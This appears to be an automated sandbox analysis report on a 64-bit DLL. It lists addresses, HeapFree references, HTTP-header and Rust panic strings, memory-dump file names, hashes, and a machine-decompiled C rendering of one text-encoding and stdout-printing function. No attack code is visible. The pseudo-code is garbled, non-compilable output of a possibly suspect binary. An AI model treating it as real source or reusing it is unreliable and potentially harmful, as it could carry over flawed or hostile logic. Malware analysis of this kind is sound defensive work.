0x7fef30b6a73
0x7fef30b6a77
0x7fef30b6a82
0x7fef30b6a8e
0x7fef30b6a9c
0x7fef30b6aa6
0x7fef30b6ab4
0x7fef30b6aba
0x7fef30b6ac9
0x7fef30b6ad8
0x7fef30b6ae0
0x7fef30b6ae8
0x7fef30b6aec
0x7fef30b6af4
0x7fef30b6af8
0x7fef30b6afc
0x7fef30b6b04
0x7fef30b6b10
0x7fef30b6b24
0x7fef30b6b2d
0x7fef30b6b3c
0x7fef30b6b3e
0x7fef30b6b46
0x7fef30b6b5b
0x7fef30b6b63
0x7fef30b6b6b
0x7fef30b6b70
0x7fef30b6b77
0x7fef30b6b82
0x7fef30b6b90
0x7fef30b6b9f
0x7fef30b6bb2
0x7fef30b6bc2
0x7fef30b6bcb
0x7fef30b6bcf
0x7fef30b6bd2
0x7fef30b6bd5
0x7fef30b6bef
0x7fef30b6bf7
0x7fef30b6bff
0x7fef30b6c03
0x7fef30b6c0e
0x7fef30b6c12
0x7fef30b6c1d
0x7fef30b6c22
0x7fef30b6c27
0x7fef30b6c2c
0x7fef30b6c3c
0x7fef30b6c41
0x7fef30b6c46
0x7fef30b6c56
0x7fef30b6c61
0x7fef30b6c66
0x7fef30b6c6b
0x7fef30b6c74
0x7fef30b6c77
0x7fef30b6c7b
0x7fef30b6c84
0x7fef30b6c88
0x7fef30b6c8c
0x7fef30b6c94
0x7fef30b6c9c
0x7fef30b6c9f
0x7fef30b6ca8
0x7fef30b6cac
0x7fef30b6cbb
0x7fef30b6cc2
0x7fef30b6cd2
0x7fef30b6ce1
0x7fef30b6cee
0x7fef30b6cf6
0x7fef30b6d1e

APIs

HeapFree.KERNEL32 ref: 000007FEF30B6AB4
HeapFree.KERNEL32 ref: 000007FEF30B6B90
HeapFree.KERNEL32 ref: 000007FEF30B6BB2
HeapFree.KERNEL32 ref: 000007FEF30B6D04
HeapFree.KERNEL32 ref: 000007FEF30B6E9A

Strings

nked, xrefs: 000007FEF30B694A
content-lengthcontent-encoding, xrefs: 000007FEF30B6982
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30B69D7
chun, xrefs: 000007FEF30B6943
Content-LengthTransfer-EncodingchunkedauthorizationAuthorizationBasic , xrefs: 000007FEF30B6E2F
transfer-encoding, xrefs: 000007FEF30B680E

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: Content-LengthTransfer-EncodingchunkedauthorizationAuthorizationBasic $called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$chun$content-lengthcontent-encoding$nked$transfer-encoding
API String ID: 3298025750-632181197
Opcode ID: 000a730d5aa132af13ca085562983f5915aeb86ca30652001a6617c1785ce21f
Instruction ID: 158591d3ac06a533b7dd94ba6eb01a8e9a6202630fd94c97495dd0a36aac0633
Opcode Fuzzy Hash: 000a730d5aa132af13ca085562983f5915aeb86ca30652001a6617c1785ce21f
Instruction Fuzzy Hash: 73129372A08B8589EBA4CF11E5543AA73A5F789BC4F008126EF8D53B69DF3CE195D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF304ACF5 Relevance: 16.6, APIs: 7, Strings: 2, Instructions: 872
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E000007FE7FEF304ACF5(signed int __ebx, void* __eflags, long long __rcx, long long __rdx, signed long long __r9) {
				signed char _t168;
				signed int _t169;
				void* _t212;
				int _t218;
				signed char _t221;
				signed char _t227;
				signed char _t230;
				signed short _t235;
				signed char _t237;
				signed int _t245;
				signed char _t254;
				signed int _t261;
				signed int _t263;
				signed short _t266;
				intOrPtr _t268;
				signed int _t276;
				signed int _t282;
				signed int _t284;
				signed int _t295;
				signed int _t316;
				signed int _t329;
				signed int _t333;
				void* _t335;
				signed int _t338;
				void* _t351;
				long long _t355;
				void* _t374;
				void* _t407;
				void* _t413;
				unsigned long long _t418;
				unsigned long long _t424;
				unsigned long long _t426;
				unsigned long long _t427;
				signed long long* _t462;
				intOrPtr _t465;
				signed long long _t466;
				intOrPtr _t474;
				void* _t480;
				void* _t481;
				long long _t505;
				intOrPtr* _t516;
				signed long long _t523;
				intOrPtr _t534;
				intOrPtr _t538;
				signed long long _t540;
				long long _t544;
				intOrPtr _t546;
				signed long long _t555;
				intOrPtr _t556;
				signed long long _t560;
				signed short* _t570;
				signed short* _t571;
				long long _t574;
				signed long long _t576;
				long long* _t577;
				intOrPtr* _t578;
				void* _t579;
				intOrPtr _t585;
				void* _t586;
				long long* _t588;
				signed long long _t593;
				long long _t595;
				void* _t596;
				void* _t597;
				intOrPtr* _t599;
				void* _t600;
				void* _t609;
				signed long long _t613;
				long long _t615;
				void* _t616;
				void* _t617;
				signed long long _t618;

				_t593 = __r9;
				_t578 = _t579 + 0x80;
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				asm("movaps [ebp+0xc0], xmm7");
				asm("movaps [ebp+0xb0], xmm6");
				 *((long long*)(_t578 + 0xa8)) = 0xfffffffe;
				 *((long long*)(_t578 + 0x18)) = __rdx;
				 *((long long*)(_t578 + 0x28)) = __rcx;
				_t418 =  *((intOrPtr*)( *[gs:eax] + 0x18));
				 *((long long*)(_t578 + 0x38)) = _t418 + 0x20;
				 *(_t578 + 0x20) = _t418;
				_t595 =  *((intOrPtr*)(_t418 + 0x20));
				asm("movaps xmm7, [0xb72fa]");
				asm("inc sp");
				asm("inc sp");
				asm("inc sp");
				asm("inc sp");
				asm("movdqa xmm6, [0xb732e]");
				asm("inc sp");
				asm("inc sp");
				asm("inc sp");
				_t570 =  *((intOrPtr*)(_t595 + 0x50));
				r15d =  *(_t595 + 0x48) & 0x0000ffff;
				r15d = r15d & 0xfffffffe;
				 *((long long*)(_t578 + 0x58)) = 1;
				asm("pxor xmm0, xmm0");
				asm("movdqu [ecx], xmm0");
				asm("bt eax, 0x1");
				asm("dec ecx");
				if (__eflags != 0) goto 0xf304b611;
				_t617 = _t616 + _t570;
				if (0 == 0) goto 0xf304ae27;
				goto 0xf304ae37;
				if (_t570 == _t617) goto 0xf304afb7;
				_t235 =  *_t570 & 0x0000ffff;
				_t571 =  &(_t570[1]);
				if ((_t235 & 0x0000f800) != 0xd800) goto 0xf304aeac;
				if ((_t235 & 0x0000ffff) - 0xdbff > 0) goto 0xf304af1b;
				if (_t571 == _t617) goto 0xf304af1f;
				_t351 = (( *_t571 & 0x0000ffff) + 0x00002000 & 0x0000ffff) - 0xfc00;
				if (_t351 < 0) goto 0xf304af32;
				goto 0xf304aeb0;
				if (_t351 != 0) goto 0xf304aeef;
				if ( *((intOrPtr*)(_t578 + 0x68)) !=  *((intOrPtr*)(_t578 + 0x60))) goto 0xf304aeda;
				_t168 = E000007FE7FEF306953C( *((intOrPtr*)(_t578 + 0x68)) -  *((intOrPtr*)(_t578 + 0x60)), _t578 + 0x58,  *((intOrPtr*)(_t578 + 0x68)));
				_t538 =  *((intOrPtr*)(_t578 + 0x68));
				_t424 =  *((intOrPtr*)(_t578 + 0x58));
				 *((char*)(_t424 + _t538)) = __ebx;
				 *((long long*)(_t578 + 0x68)) = _t538 + 1;
				goto 0xf304ae1d;
				 *(_t578 + 0x78) = 0;
				if (__ebx - 0x800 >= 0) goto 0xf304af26;
				_t169 = _t168 | 0x000000c0;
				 *(_t578 + 0x78) = _t169;
				_t221 = __ebx & 0x0000003f | 0x00000080;
				 *(_t578 + 0x79) = _t221;
				r8d = 2;
				goto 0xf304afa3;
				goto 0xf304af39;
				goto 0xf304af39;
				if (_t221 - 0x10000 >= 0) goto 0xf304af6c;
				goto 0xf304af45;
				r14d = _t169;
				 *(_t578 + 0x78) = 0;
				 *(_t578 + 0x78) = 0xbadbed;
				 *(_t578 + 0x79) = 0xad;
				 *((char*)(_t578 + 0x7a)) = 0xbd;
				r8d = 3;
				goto 0xf304afa5;
				_t237 = _t235 + 0x00002800 | 0x000000f0;
				 *(_t578 + 0x78) = _t237;
				 *(_t578 + 0x79) = _t237 & 0x0000003f | 0x00000080;
				_t426 = _t424 >> 0x16 >> 0x16;
				 *((char*)(_t578 + 0x7a)) = 0xad;
				 *((char*)(_t578 + 0x7b)) = 0xbd;
				r8d = 4;
				_t540 = _t578 + 0x78;
				E000007FE7FEF30535D0(_t578 + 0x58, _t540, _t418 >> 2);
				goto 0xf304ae1d;
				_t556 =  *((intOrPtr*)(_t578 + 0x58));
				_t574 =  *((intOrPtr*)(_t578 + 0x68));
				_t355 = _t574;
				 *((long long*)(_t578 + 0x30)) = _t595;
				if (_t355 == 0) goto 0xf304b1a0;
				if (_t355 < 0) goto 0xf304b9ac;
				_t502 = _t574;
				E000007FE7FEF305A520();
				if (_t426 == 0) goto 0xf304b9b3;
				if (_t574 - 0x10 < 0) goto 0xf304b1a5;
				asm("movdqu xmm0, [edi+ecx]");
				asm("pshufd xmm3, xmm0, 0xee");
				asm("movdqa xmm1, xmm3");
				asm("por xmm1, xmm0");
				asm("dec ax");
				if ((_t540 & 0x80808080) != 0) goto 0xf304b1a7;
				asm("dec ax");
				asm("movdqa xmm2, xmm0");
				asm("psrlq xmm2, 0x20");
				asm("movdqa xmm1, xmm3");
				asm("psrlq xmm1, 0x18");
				asm("shufps xmm1, xmm2, 0xe4");
				asm("movdqa xmm2, xmm0");
				asm("psrlq xmm2, 0x30");
				asm("movdqa xmm4, xmm3");
				asm("psrlq xmm4, 0x28");
				asm("shufps xmm4, xmm2, 0xe4");
				asm("andps xmm4, xmm7");
				asm("andps xmm1, xmm7");
				asm("packuswb xmm1, xmm4");
				asm("movdqa xmm2, xmm0");
				asm("psrlq xmm2, 0x10");
				asm("psrlq xmm3, 0x8");
				asm("shufps xmm3, xmm2, 0xe4");
				asm("dec ax");
				asm("shufps xmm2, xmm0, 0xe4");
				asm("andps xmm3, xmm7");
				asm("andps xmm2, xmm7");
				asm("packuswb xmm2, xmm3");
				asm("movdqa xmm4, xmm0");
				asm("psrlq xmm4, 0x18");
				asm("inc sp");
				asm("inc cx");
				asm("psrlq xmm3, 0x20");
				asm("movsd xmm3, xmm4");
				asm("movdqa xmm4, xmm0");
				asm("psrlq xmm4, 0x28");
				asm("inc cx");
				asm("psrlq xmm5, 0x30");
				asm("movsd xmm5, xmm4");
				asm("andpd xmm5, xmm7");
				asm("andpd xmm3, xmm7");
				asm("packuswb xmm3, xmm5");
				asm("movdqa xmm4, xmm0");
				asm("psrlq xmm4, 0x8");
				asm("inc cx");
				asm("repne inc esp");
				asm("inc ebp");
				asm("repne inc ecx");
				asm("punpcklbw xmm4, xmm4");
				asm("pshuflw xmm4, xmm4, 0xe8");
				asm("pand xmm4, [0xb6fae]");
				asm("movdqa xmm5, xmm0");
				asm("inc cx");
				asm("por xmm5, xmm4");
				asm("inc cx");
				asm("pandn xmm4, xmm5");
				asm("packuswb xmm2, xmm2");
				asm("packuswb xmm2, xmm2");
				asm("packuswb xmm3, xmm3");
				asm("packuswb xmm3, xmm3");
				asm("psllq xmm3, 0x18");
				asm("inc cx");
				asm("por xmm4, xmm3");
				asm("pslldq xmm2, 0x7");
				asm("inc cx");
				asm("pandn xmm3, xmm2");
				asm("inc cx");
				asm("por xmm4, xmm3");
				asm("packuswb xmm1, xmm1");
				asm("packuswb xmm1, xmm1");
				asm("inc cx");
				asm("pslldq xmm1, 0xb");
				asm("por xmm1, xmm4");
				asm("pand xmm1, xmm6");
				asm("movdqa xmm2, xmm6");
				asm("pandn xmm2, xmm0");
				asm("por xmm2, xmm1");
				asm("movdqa xmm0, xmm2");
				asm("inc cx");
				asm("movdqa xmm1, xmm0");
				asm("inc cx");
				asm("pcmpeqb xmm1, xmm0");
				asm("inc cx");
				asm("por xmm1, xmm2");
				asm("movdqu [eax+ecx], xmm1");
				_t39 = _t502 + 0x10; // 0x10
				if (_t574 + 0x20 - _t574 <= 0) goto 0xf304affe;
				_t505 = _t39;
				goto 0xf304b1a7;
				_t618 = _t556 + _t505;
				_t544 = _t574 - _t505;
				 *((long long*)(_t578 + 0x50)) = _t544;
				 *(_t578 + 0x78) = _t426;
				 *((long long*)(_t578 + 0x80)) = _t574;
				 *((long long*)(_t578 + 0x88)) = _t505;
				 *((long long*)(_t578 + 0x70)) = _t556 + _t574;
				_t427 = _t618;
				r12d = 0;
				if (_t427 ==  *((intOrPtr*)(_t578 + 0x70))) goto 0xf304b589;
				_t227 =  *_t427;
				_t276 = _t227 & 0x000000ff;
				if (_t276 < 0) goto 0xf304b1ed;
				goto 0xf304b24d;
				if (_t276 - 0xdf <= 0) goto 0xf304b235;
				_t333 = ( *(_t427 + 1) & 0x3f) << 6;
				if (_t227 - 0xf0 < 0) goto 0xf304b242;
				_t245 = (_t276 & 7) << 0x12;
				_t316 = ( *(_t427 + 2) & 0x3f | _t333) << 6;
				if (( *(_t427 + 3) & 0x3f | _t316 | _t245) == 0x110000) goto 0xf304b589;
				goto 0xf304b24d;
				goto 0xf304b24d;
				_t613 = _t427 + 3;
				_t282 = _t316 | (_t245 << 0x00000006 | _t333) << 0x0000000c;
				_t609 = _t595 - _t427 + _t613;
				if (_t282 == 0x3a3) goto 0xf304b285;
				if (_t282 == 0x110000) goto 0xf304b589;
				if (_t282 - 0x80 >= 0) goto 0xf304b2a0;
				goto 0xf304b2fb;
				if (_t595 == 0) goto 0xf304b315;
				if (_t595 -  *((intOrPtr*)(_t578 + 0x50)) >= 0) goto 0xf304b30f;
				if ( *((char*)(_t618 + _t595)) - 0xbf > 0) goto 0xf304b315;
				goto 0xf304b969;
				r8d = 0x599;
				sil =  *((intOrPtr*)(((_t427 >> 1) + 0x80808080 << 4) + 0xf3106078)) != ((_t544 - 0x00000041 - 0x0000001a > 0x00000000) << 0x00000005 | _t282);
				_t335 =  <  ? 0xff : 0;
				if (sil == 1) goto 0xf304b2f3;
				_t374 = (sil & 0xffffffff) - 0xff;
				if (_t374 != 0) goto 0xf304b3db;
				goto 0xf304b2f6;
				if (_t374 > 0) goto 0xf304b2ad;
				E000007FE7FEF3051B10((_t544 - 0x00000041 - 0x0000001a > 0x00000000) << 0x00000005 | _t282, _t578 + 0x78);
				_t596 = _t609;
				goto 0xf304b1d4;
				if (_t374 != 0) goto 0xf304b969;
				 *(_t578 + 0x48) = _t613;
				_t480 = _t618 + _t596;
				if (_t480 == _t618) goto 0xf304b4fd;
				_t254 =  *((intOrPtr*)(_t480 - 1));
				if (_t254 < 0) goto 0xf304b337;
				_t481 = _t480 - 1;
				goto 0xf304b38e;
				_t284 =  *(_t481 - 2) & 0x000000ff;
				if (_t284 - 0xc0 >= 0) goto 0xf304b35f;
				if (dil - 0xc0 >= 0) goto 0xf304b368;
				_t338 = ( *(_t481 - 4) & 7) << 6;
				goto 0xf304b36f;
				goto 0xf304b377;
				if ((_t254 & 0x3f | (_t284 & 0x1f | (( *(_t481 - 3) & 0x3f | _t338) & 0x0000000f) << 0x00000006) << 0x00000006) == 0x110000) goto 0xf304b4fd;
				if (0 != 0) goto 0xf304b3a6;
				if (E000007FE7FEF30592F0(_t254 & 0x3f | (_t284 & 0x1f | (( *(_t481 - 3) & 0x3f | _t338) & 0x0000000f) << 0x00000006) << 0x00000006, 0, _t613, _t544, __r9) == 0) goto 0xf304b3a6;
				goto 0xf304b3a8;
				if (0x110000 == 0x110000) goto 0xf304b31f;
				E000007FE7FEF3059440(0x110000, 0x110000 - 0x110000, _t613, _t544, __r9);
				if (1 == 0) goto 0xf304b4fd;
				_t597 = _t596 + 2;
				if (1 == 0) goto 0xf304b439;
				if (_t597 -  *((intOrPtr*)(_t578 + 0x50)) >= 0) goto 0xf304b433;
				if ( *((char*)(_t618 + _t597)) - 0xbf > 0) goto 0xf304b439;
				goto 0xf304b98c;
				if (_t338 == 0) goto 0xf304b2fb;
				asm("dec ax");
				asm("pshufd xmm0, xmm0, 0x55");
				asm("movd edi, xmm0");
				if (0x110000 == 0) goto 0xf304b56a;
				E000007FE7FEF3051B10( *((intOrPtr*)(((_t427 >> 1) + 0x80808080 << 4) + 0x7fef310607c)), _t578 + 0x78);
				E000007FE7FEF3051B10(_t338, _t578 + 0x78);
				E000007FE7FEF3051B10(0x110000, _t578 + 0x78);
				goto 0xf304b1d4;
				if (0x110000 != 0) goto 0xf304b98c;
				_t599 = _t609 + _t618;
				if (_t599 ==  *((intOrPtr*)(_t578 + 0x70))) goto 0xf304b54d;
				_t230 =  *_t599;
				r14d = _t230 & 0x000000ff;
				if (r14b < 0) goto 0xf304b45a;
				_t600 = _t599 + 1;
				goto 0xf304b4c8;
				if (r14b - 0xdf <= 0) goto 0xf304b4ae;
				_t329 = ( *(_t600 + 1) & 0x3f) << 6;
				if (_t230 - 0xf0 < 0) goto 0xf304b4bc;
				r14d =  *(_t600 + 3) & 0x000000ff;
				_t261 = (r14d & 7) << 0x12;
				_t295 = ( *(_t600 + 2) & 0x3f | _t329) << 6;
				r14d = r14d & 0x0000003f;
				r14d = r14d | _t295;
				r14d = r14d | _t261;
				if (r14d == 0x110000) goto 0xf304b54d;
				goto 0xf304b4c8;
				_t263 = _t261 << 0x00000006 | _t329;
				r14d = _t263;
				goto 0xf304b4c8;
				r14d = _t295 | _t263 << 0x0000000c;
				if (1 != 0) goto 0xf304b4e2;
				if (E000007FE7FEF30592F0(r14d, 1, _t613, _t544, __r9) == 0) goto 0xf304b4e2;
				r14d = 0x110000;
				goto 0xf304b4e4;
				if (r14d == 0x110000) goto 0xf304b43e;
				_t266 = r14d;
				if (E000007FE7FEF3059440(_t266, r14d - 0x110000, _t613, _t544, __r9) == 0) goto 0xf304b54d;
				if ( *((intOrPtr*)(_t578 + 0x80)) -  *((intOrPtr*)(_t578 + 0x88)) - 2 >= 0) goto 0xf304b52e;
				r8d = 2;
				0xf30fdde0();
				_t546 =  *((intOrPtr*)(_t578 + 0x88));
				 *((short*)( *(_t578 + 0x78) + _t546)) = 0x83cf;
				 *((long long*)(_t578 + 0x88)) = _t546 + 2;
				goto 0xf304b1d4;
				if ( *((intOrPtr*)(_t578 + 0x80)) -  *((intOrPtr*)(_t578 + 0x88)) - 1 <= 0) goto 0xf304b518;
				goto 0xf304b52e;
				E000007FE7FEF3051B10(_t295 | _t263 << 0x0000000c, _t578 + 0x78);
				E000007FE7FEF3051B10(0x82cf, _t578 + 0x78);
				goto 0xf304b1d4;
				if ( *((intOrPtr*)(_t578 + 0x88)) -  *((intOrPtr*)(_t578 + 0x18)) >= 0) goto 0xf304b59a;
				goto 0xf304b5ad;
				sil = E000007FE7FEF30F2860(_t266,  *((intOrPtr*)(_t578 + 0x28)),  *(_t578 + 0x78),  *((intOrPtr*)(_t578 + 0x18))) == 0;
				_t560 =  *((intOrPtr*)(_t578 + 0x30));
				if ( *((long long*)(_t578 + 0x80)) == 0) goto 0xf304b5ce;
				HeapFree(??, ??, ??);
				if (sil != 0) goto 0xf304b621;
				_t516 =  *((intOrPtr*)(_t578 + 0x38));
				if (_t516 ==  *((intOrPtr*)( *(_t578 + 0x20) + 0x28))) goto 0xf304b62a;
				 *((long long*)(_t578 + 0x38)) =  *_t516;
				if ( *((long long*)(_t578 + 0x60)) == 0) goto 0xf304addd;
				_t585 =  *((intOrPtr*)(_t578 + 0x58));
				HeapFree(??, ??, ??);
				goto 0xf304addd;
				E000007FE7FEF30FE7CE(_t266, 0,  *((long long*)(_t578 + 0x60)), _t578 + 0x58,  *(_t578 + 0x78), _t585);
				goto 0xf304ae18;
				_t576 =  *((intOrPtr*)(_t560 + 0x20));
				goto 0xf304b8e0;
				 *(_t578 + 0x78) = 0xf30fcf13;
				asm("dec eax");
				asm("dec eax");
				r8d = _t266 & 0x0000ffff;
				_t586 = _t585 +  *(_t578 + 0x78);
				asm("pxor xmm0, xmm0");
				asm("movdqa [ebp-0x40], xmm0");
				r10b = 1;
				r9d =  *(_t576 + 0xf31034a0) & 0x000000ff;
				r14d =  *((_t576 | 0x00000002) + 0xf31034a0) & 0x000000ff;
				r15d =  *((_t576 | 0x00000003) + 0xf31034a0) & 0x000000ff;
				 *(_t578 + _t576 - 0x40) = (_t560 << 0x00000008 | _t593 | _t613 << 0x00000010 | _t618 << 0x00000018 |  !(0x953f2557 -  *0xf319c2e0) << 0x00000020 | _t481 + 0xfffffffffffffff7 << 0x00000028 | (_t576 | 0x00000006) << 0x00000030 | (_t576 | 0x00000007) << 0x00000038) ^  *(_t586 + _t576);
				r10d = 0;
				if ((r10b & 0x00000001) != 0) goto 0xf304b66d;
				_t523 = _t578 - 0x40;
				 *(_t523 + 0x10) =  *(_t586 + 0x10) ^ 0x0000007e;
				_t462 = _t578 - 0x50;
				 *_t462 = _t523;
				_t462[1] = 0x11;
				 *(_t578 - 0x18) = _t462;
				 *((long long*)(_t578 - 0x10)) = 0xf3096a50;
				 *((long long*)(_t578 - 0x28)) = "stdoutlibrary\\std\\src\\io\\mod.rs";
				 *((long long*)(_t578 - 0x20)) = 6;
				_t465 =  *0xf319ce88; // 0x3
				if (_t465 != 3) goto 0xf304b95f;
				_t466 =  *0xf319ce98; // 0x0
				_t268 =  *0xf319cfd8; // 0x0
				_t407 = _t466 -  *((intOrPtr*)( *[gs:0x58] + _t523 * 8)) + 0x40;
				if (_t407 != 0) goto 0xf304b7ae;
				if (_t407 != 0) goto 0xf304b7e1;
				E000007FE7FEF30FE2A0( *((_t576 | 0x00000005) + 0xf31034a0) & 0x000000ff, _t268, 0x26,  *((_t576 | 0x00000001) + 0xf31034a0) & 0x000000ff, _t407, "lock count overflow in reentrant mutexlibrary\\std\\src\\sys_common\\remutex.rs",  *[gs:0x58], 0xf3125f50, _t593, 0xf31034a0);
				asm("ud2");
				__imp__AcquireSRWLockExclusive();
				 *0xf319ce98 =  *((intOrPtr*)( *[gs:0x58] + _t466 * 8)) + 0x40;
				 *0xf319cec8 = 1;
				_t615 = _t578 + 0x40;
				 *_t615 = 0xf319ce90;
				_t577 = _t578 - 8;
				 *_t577 = _t615;
				 *((long long*)(_t577 + 8)) = 0xf319ce90;
				_t588 = _t578 + 0x78;
				 *_t588 = 0xf3103480;
				 *((long long*)(_t588 + 8)) = 2;
				 *((long long*)(_t588 + 0x10)) = 0xf319ce90;
				 *((long long*)(_t588 + 0x20)) = _t578 - 0x18;
				 *((long long*)(_t588 + 0x28)) = 1;
				_t212 = E000007FE7FEF3054B50(0x26, _t577, 0xf3125850, _t588);
				_t555 =  *_t578;
				if (_t212 == 0) goto 0xf304b853;
				_t487 =  !=  ? _t555 : 0xf314a668;
				goto 0xf304b8be;
				if (_t555 == 0) goto 0xf304b8be;
				if (2 != 1) goto 0xf304b8be;
				 *((long long*)(_t578 + 0x70)) = _t555 - 1;
				 *(_t578 + 0x48) = _t555;
				 *((intOrPtr*)( *((intOrPtr*)(_t555 + 7))))();
				_t474 =  *((intOrPtr*)( *(_t578 + 0x48) + 7));
				if ( *((long long*)(_t474 + 8)) == 0) goto 0xf304b8aa;
				_t413 =  *((long long*)(_t474 + 0x10)) - 0x11;
				if (_t413 < 0) goto 0xf304b89b;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				_t534 =  *((intOrPtr*)(_t578 + 0x40));
				 *((intOrPtr*)(_t534 + 0x38)) =  *((intOrPtr*)(_t534 + 0x38)) - 1;
				if (_t413 != 0) goto 0xf304b8d5;
				 *((long long*)(_t534 + 8)) = 0;
				__imp__ReleaseSRWLockExclusive();
				_t414 =  !=  ? _t555 : 0xf314a668;
				if (( !=  ? _t555 : 0xf314a668) != 0) goto 0xf304b9c2;
				if ( *((long long*)(_t578 + 0x60)) == 0) goto 0xf304b8fa;
				_t218 = HeapFree(??, ??, ??);
				asm("movaps xmm6, [ebp+0xb0]");
				asm("movaps xmm7, [ebp+0xc0]");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				asm("inc esp");
				return _t218;
			}

0x7fef304acf5
0x7fef304ad08
0x7fef304ad10
0x7fef304ad18
0x7fef304ad20
0x7fef304ad28
0x7fef304ad30
0x7fef304ad38
0x7fef304ad40
0x7fef304ad48
0x7fef304ad50
0x7fef304ad57
0x7fef304ad5e
0x7fef304ad69
0x7fef304ad6d
0x7fef304ad7b
0x7fef304ad83
0x7fef304ad87
0x7fef304ad8b
0x7fef304ad8f
0x7fef304ad96
0x7fef304ad9f
0x7fef304ada8
0x7fef304adb1
0x7fef304adba
0x7fef304adc2
0x7fef304adcb
0x7fef304add4
0x7fef304addd
0x7fef304ade8
0x7fef304adeb
0x7fef304adef
0x7fef304adfb
0x7fef304adff
0x7fef304ae0a
0x7fef304ae0e
0x7fef304ae12
0x7fef304ae18
0x7fef304ae20
0x7fef304ae25
0x7fef304ae2a
0x7fef304ae30
0x7fef304ae33
0x7fef304ae48
0x7fef304ae4f
0x7fef304ae58
0x7fef304ae70
0x7fef304ae76
0x7fef304aeaa
0x7fef304aec1
0x7fef304aecb
0x7fef304aed1
0x7fef304aed6
0x7fef304aeda
0x7fef304aede
0x7fef304aee4
0x7fef304aeea
0x7fef304aeef
0x7fef304aefc
0x7fef304af02
0x7fef304af04
0x7fef304af0a
0x7fef304af0d
0x7fef304af10
0x7fef304af16
0x7fef304af1d
0x7fef304af24
0x7fef304af2c
0x7fef304af30
0x7fef304af36
0x7fef304af39
0x7fef304af4c
0x7fef304af58
0x7fef304af61
0x7fef304af64
0x7fef304af6a
0x7fef304af73
0x7fef304af76
0x7fef304af86
0x7fef304af89
0x7fef304af91
0x7fef304af9a
0x7fef304af9d
0x7fef304afa9
0x7fef304afad
0x7fef304afb2
0x7fef304afb7
0x7fef304afbb
0x7fef304afbf
0x7fef304afc2
0x7fef304afc6
0x7fef304afcc
0x7fef304afd7
0x7fef304afda
0x7fef304afec
0x7fef304aff6
0x7fef304affe
0x7fef304b003
0x7fef304b008
0x7fef304b00c
0x7fef304b010
0x7fef304b018
0x7fef304b01e
0x7fef304b023
0x7fef304b027
0x7fef304b02c
0x7fef304b030
0x7fef304b035
0x7fef304b039
0x7fef304b03d
0x7fef304b042
0x7fef304b046
0x7fef304b04b
0x7fef304b04f
0x7fef304b052
0x7fef304b055
0x7fef304b059
0x7fef304b05d
0x7fef304b062
0x7fef304b067
0x7fef304b06f
0x7fef304b074
0x7fef304b078
0x7fef304b07b
0x7fef304b07e
0x7fef304b082
0x7fef304b086
0x7fef304b08b
0x7fef304b091
0x7fef304b096
0x7fef304b09b
0x7fef304b09f
0x7fef304b0a3
0x7fef304b0a8
0x7fef304b0ad
0x7fef304b0b2
0x7fef304b0b6
0x7fef304b0ba
0x7fef304b0be
0x7fef304b0c2
0x7fef304b0c6
0x7fef304b0cb
0x7fef304b0d1
0x7fef304b0d6
0x7fef304b0db
0x7fef304b0e1
0x7fef304b0e5
0x7fef304b0ea
0x7fef304b0f2
0x7fef304b0f6
0x7fef304b0fb
0x7fef304b0ff
0x7fef304b104
0x7fef304b108
0x7fef304b10c
0x7fef304b110
0x7fef304b114
0x7fef304b118
0x7fef304b11d
0x7fef304b122
0x7fef304b126
0x7fef304b12b
0x7fef304b130
0x7fef304b134
0x7fef304b139
0x7fef304b13d
0x7fef304b141
0x7fef304b145
0x7fef304b14a
0x7fef304b14f
0x7fef304b153
0x7fef304b157
0x7fef304b15b
0x7fef304b15f
0x7fef304b163
0x7fef304b167
0x7fef304b16c
0x7fef304b170
0x7fef304b175
0x7fef304b179
0x7fef304b17e
0x7fef304b182
0x7fef304b187
0x7fef304b195
0x7fef304b19b
0x7fef304b19e
0x7fef304b1a7
0x7fef304b1ae
0x7fef304b1b1
0x7fef304b1b5
0x7fef304b1b9
0x7fef304b1c0
0x7fef304b1ca
0x7fef304b1ce
0x7fef304b1d1
0x7fef304b1d8
0x7fef304b1de
0x7fef304b1e0
0x7fef304b1e5
0x7fef304b1eb
0x7fef304b1fc
0x7fef304b202
0x7fef304b20d
0x7fef304b216
0x7fef304b219
0x7fef304b229
0x7fef304b233
0x7fef304b240
0x7fef304b242
0x7fef304b24b
0x7fef304b253
0x7fef304b25c
0x7fef304b264
0x7fef304b270
0x7fef304b283
0x7fef304b288
0x7fef304b292
0x7fef304b299
0x7fef304b29b
0x7fef304b2a7
0x7fef304b2c6
0x7fef304b2cf
0x7fef304b2d6
0x7fef304b2dc
0x7fef304b2e2
0x7fef304b2f1
0x7fef304b2f9
0x7fef304b2ff
0x7fef304b307
0x7fef304b30a
0x7fef304b30f
0x7fef304b315
0x7fef304b319
0x7fef304b322
0x7fef304b328
0x7fef304b32d
0x7fef304b32f
0x7fef304b335
0x7fef304b337
0x7fef304b33e
0x7fef304b348
0x7fef304b355
0x7fef304b35d
0x7fef304b366
0x7fef304b388
0x7fef304b390
0x7fef304b39b
0x7fef304b3a4
0x7fef304b3ae
0x7fef304b3b6
0x7fef304b3bd
0x7fef304b3c3
0x7fef304b3c7
0x7fef304b3cd
0x7fef304b3d4
0x7fef304b3d6
0x7fef304b3ed
0x7fef304b3f3
0x7fef304b3f8
0x7fef304b3fd
